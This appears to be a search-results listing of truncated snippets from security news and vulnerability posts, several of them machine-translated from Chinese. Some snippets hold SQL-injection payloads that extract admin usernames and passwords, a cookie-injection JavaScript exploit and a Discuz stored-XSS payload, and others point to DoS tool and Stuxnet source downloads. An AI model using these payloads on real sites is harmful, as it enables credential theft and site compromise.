5320 matches found
http-litespeed-sourcecode-download NSE Script
Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending a HTTP request with a null byte followed by a .txt file extension CVE-2010-2333. If the server is not vulnerable it returns an error 400. If index.php i...
Wireshark 1.6.1 and 1.4.8 Released
Wireshark 1.6.1 and 1.4.8 Released Wireshark 1.6.1 and 1.4.8 have been released. Installers for Windows, Mac OS X 10.5.5 and above Intel and PPC, and source code are now available. In 1.6.1 Two vulnerabilities have been fixed. See the advisory for details. Many other bugs have been fixed. For a...
Set sail for the enterprise built Station system cookie injection vulnerabilities pass to kill all versions-bug warning-the black bar safety net
by Mr. DzY from www.0855.tv Due to the online open source of something,the copyright cannot be found. This day let's just say almost it. Specific copyright no way to check the similarity of the kernel too much. Source code download: Official website: Official demo: Directly on the virus:...
Amoy Royal Taobao guest security vulnerabilities and fixes-vulnerability warning-the black bar safety net
Official website: http://www.taodisoft.com 1, demo Station background turned out to have a place to upload pictures, does not prohibit the upload. 2, the upload image simple filtration, easy to break, Upload a php file, and can be executed. 3, the servervpsconfiguration severe lower, get a webshe...
XerXes - Most powerful dos tool
XerXes - Most powerful dos tool XerXes is one of the most powerful private dos tool. This tools was used by The Jester to Hits WikiLeaks Site DoS Attack. Get Source Code here : / XerXes - Most powerful dos tool - THN https://www.thehackernews.com / include stdio.h include stdlib.h include string....
XerXes - Most powerful dos tool
XerXes - Most powerful dos tool XerXes is one of the most powerful private dos tool. This tools was used by The Jester to Hits WikiLeaks Site DoS Attack. Get Source Codehere : / XerXes - Most powerful dos tool - THN https://www.thehackernews.com / include include include include include include...
Les video AI Xin technology source cookie injection vulnerability-vulnerability warning-the black bar safety net
by Mr. DzY from www.0855.tv 源码 下载 :http://www.mycodes.net/25/4585.htm Default background:admin/login. asp Injection point:http://www. xxxx. com/shownews. asp? id=2 1 6 exp: javascript:alertdocument. cookie=”id=”+escape“2 1 6 and 1=2 union select 1,username,password,4,5,6,7,8,9,1 0 from admin”;...
Pastebin Could Hold Clues To Hack At Your Company
Worried that your organization might be the victim of a targeted attack or data breach? The proof may be right out in the open: posted for the world to see on Pastebin.com, LodgeIT, Pastie.org and other sites according to security expert Lenny Zeltser. Writing on his blog, Zeltser said that...
FBI: Employee Passed Chicago Mercantile Exchange Secrets to China
A 10 year employee of CME Group in Chicago is alleged to have stolen trade secrets and proprietary source code used to run trading systems for the Chicago Mercantile Exchange, according to a criminal complaint filed in U.S. District Court in Illinois. The complaint, dated June 30, 2011 and signed...
vsftpd 2.3.4源程序软件包存在后门漏洞
BUGTRAQ ID: 48539 vsftpd是Very Secure FTP daemon的缩写,是UNIX类平台上安全的FTP服务器。 vsftpd 2.3.4版本被植入了后门代码,远程攻击者可利用这个问题控制受影响系统。 此漏洞源于通过项目主服务器发布的有后门的vsftpd 2.3.4源代码程序包 vsftpd-2.3.4.tar.gz。 Vsftpd 2.3.x 厂商补丁: Vsftpd ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://vsftpd.beasts.org/ Mathias Kresin ()提供了如下测试方法:...
Milk tea franchise website source code 1.0 injection vulnerabilities+Backdoor-vulnerability warning-the black bar safety net
by Mr. DzY Default background:admin/adminlogin. asp 下载 :http://www.mycodes.net/25/4540.htm exp: union select 1,txqpass,3,4,5,txqname,7,8,9 from admin test: http://localhost/brand.asp?aflid=1 union select 1,txqpass,3,4,5,txqname,7,8,9 from admin The back door:...
OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
No description provided by source. OpenSSH 3.5p1 Remote Root Exploit for FreeBSD Discovered and Exploited By Kingcope Year 2011 -- The last two days I have been investigating a vulnerability in OpenSSH affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run OpenSSH 3.5p1 in the defaul...
Stuxnet Source Code Released Online - Download Now
Stuxnet Source Code Released Online - Download Now Stuxnet is a Microsoft Windows computer worm discovered in July 2010 that targets industrial software and equipment. While it is not the first time that crackers have targeted industrial systems,it is the first discovered malware that spies on an...
Dig Emperor Management Platform security vulnerabilities-vulnerability warning-the black bar safety net
Official website: 1, demo Station background turned out to have a place to upload pictures, does not prohibit the upload. 2, the upload image simple filtration, easy to break, Upload a php file, and can be executed. 3, the servervpsconfiguration severe lower, get a webshell directly after is a...
NO. 0 0 1 school website management system Build 1 1 0 6 2 8 injection vulnerability-vulnerability warning-the black bar safety net
NO. 0 0 1 school website management system modules: 1. Administrator information:website basic information setting, the principal mailbox, etc., database backup,user management, departments and permissions management, etc. 2. School profile:the level of classification, you can add a campus...
Discuz!多版本 存储型XSS脚本漏洞
简要描述: 2009年一次偶然间测试发现的此XSS漏洞,因为是存储型的,我想大家应该知道它的危害吧。相隔这么多年DZ不断的更新版本,但此漏洞依然存在,今天就发布出来吧!留着也没什么用会长毛的,呵呵。 在此我要感谢一下我的好朋友Jackal在09年的时候一起帮我测试漏洞的。 当时我们一起测试的是DZ6.0-DZ7.2,不知道是不是通杀啊。哈哈!没有一个一个去测试。有条件的去测试一下吧。 详细说明: 发贴进入源码模式,写入如下的exp emailurlimghttp://qhkest.com onmouseover=alert/DZ-xss-0day/; /img /url/email...
DOLE website vulnerable to hackers !
DOLE website vulnerable to hackers ! A hacker with Codename "No.One" release some vulnerability regarding DOLE via a pastebin post. We analyse it & Explaining the possible Security Breach. Hackers Find a vulnerable site on 125.5.39.135 , which having two domains on it : https://www.dole.gov.ph/...
Magic snow enterprises website system 1.0 injection exploit-vulnerability warning-the black bar safety net
Magic snow corporate website source to have news, group overview, industrial systems, human resources, investment resources, feedback, contact us section. Backstage news dynamic management, enterprise information management, industry management system, human resources management, investment...
Magic snow enterprises website system 1.0 injection vulnerabilities-vulnerability warning-the black bar safety net
Magic snow corporate website source to have news, group overview, industrial systems, human resources, investment resources, feedback, contact us section. Backstage news dynamic management, enterprise information management, industry management system, human resources management, investment...
Pole Rui enterprise website system v1. 0 cookie injection vulnerability-vulnerability warning-the black bar safety net
Pole Rui enterprise website system is for small and medium businesses specially tailored to the small business Station source code, The code is all free and open, you can modify their own learning to use, but it is strictly prohibited for commercial purposes. System Systems front Desk interface i...